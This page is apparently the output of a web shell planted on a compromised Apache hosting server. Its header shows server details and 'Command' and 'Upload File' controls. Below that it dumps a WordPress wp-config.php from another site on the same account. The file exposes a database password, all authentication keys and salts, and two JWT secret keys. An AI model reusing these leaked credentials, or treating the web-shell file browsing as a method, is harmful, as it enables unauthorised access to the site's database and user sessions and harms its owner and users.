|
Server IP : 72.167.149.90 / Your IP : 216.73.216.228 Web Server : Apache System : Linux server.zoomride.app 4.18.0-553.158.1.el8_10.x86_64 #1 SMP Wed Aug 26 03:18:33 EDT 2026 x86_64 User : zoomride2022 ( 1001) PHP Version : 8.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/zoomride2022/public_html/myzoomride.com/../shababek.net/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
if ( ! ini_get('session.save_path') ) {
session_save_path( __DIR__ . '/sessions' );
}
if ( session_status() === PHP_SESSION_NONE ) {
session_start();
}
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'zoomride2022_wp871' );
/** Database username */
define( 'DB_USER', 'zoomride2022_wp871' );
/** Database password */
define( 'DB_PASSWORD', 's.7p]SF46d' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '77ew2uz8axlfgpixin8vwiuhas8qfcsloiyrxe1f988pv3sbrwb1plathslrohjk' );
define( 'SECURE_AUTH_KEY', 'qjou1fqcnr1ogiytc4zculycpjdfbvk0b9kfwopga426qnhleisvpkaecstlgkii' );
define( 'LOGGED_IN_KEY', 'ml1yrblzqxhzxqmpneva9btzudpb0qpnfm6gxiewftu6yni9k58nww9by3fqpib9' );
define( 'NONCE_KEY', 'cozz9tfpbbucdncwmjtfo8huy6p8o2edpoe4uht36sofpb00tqleocqnfwvuyioa' );
define( 'AUTH_SALT', 'ktpvxp3cfpvyadqiwizr4us8jroogkp1prnrlbfrvirftnbmk1xto8eqibaifp4k' );
define( 'SECURE_AUTH_SALT', 'vioedfudfzlqdwzke8yoaqdokt2vsfq8gsmzpquxojqwrjearfl3ik2zhdmlnfpx' );
define( 'LOGGED_IN_SALT', 'dmuxdvlcxurodake9jv4uoed7krmbq6o3f3aaf4gspzs7tqkfim6agvvc1w9gqme' );
define( 'NONCE_SALT', 'yxherxabmjx8oqmoxre33wte7gw6tg4vgectwk8tyccfqnu9o8yo8ulz1n7hioc6' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wpjy_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', true );
define( 'WP_DEBUG_LOG', true );
define( 'WP_DEBUG_DISPLAY', false );
define('WPJ_DEBUG_TEMPLATES', true);
define('COOKIE_SAMESITE', 'None');
define('COOKIE_SECURE', true);
ini_set( 'display_errors', 1 );
ini_set( 'log_errors', 1 );
error_reporting(E_ALL);
/* Add any custom values between this line and the "stop editing" line. */
if (! defined('JWT_AUTH_SECRET_KEY')) {
define('JWT_AUTH_SECRET_KEY', 'shbk_9Fkp!2026_Xyz_Auth_Jwt_Key_98Q');
}
define('JWT_AUTH_CORS_ENABLE', true);
define('SIMPLE_JWT_AUTHENTICATION_SECRET_KEY', 'Sx9!mQ7#vL2@pZ8$kR4^nW1&cY6*eT3!aB9@uF5#dH2%jK7');
define('SIMPLE_JWT_AUTHENTICATION_CORS_ENABLE', true);
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';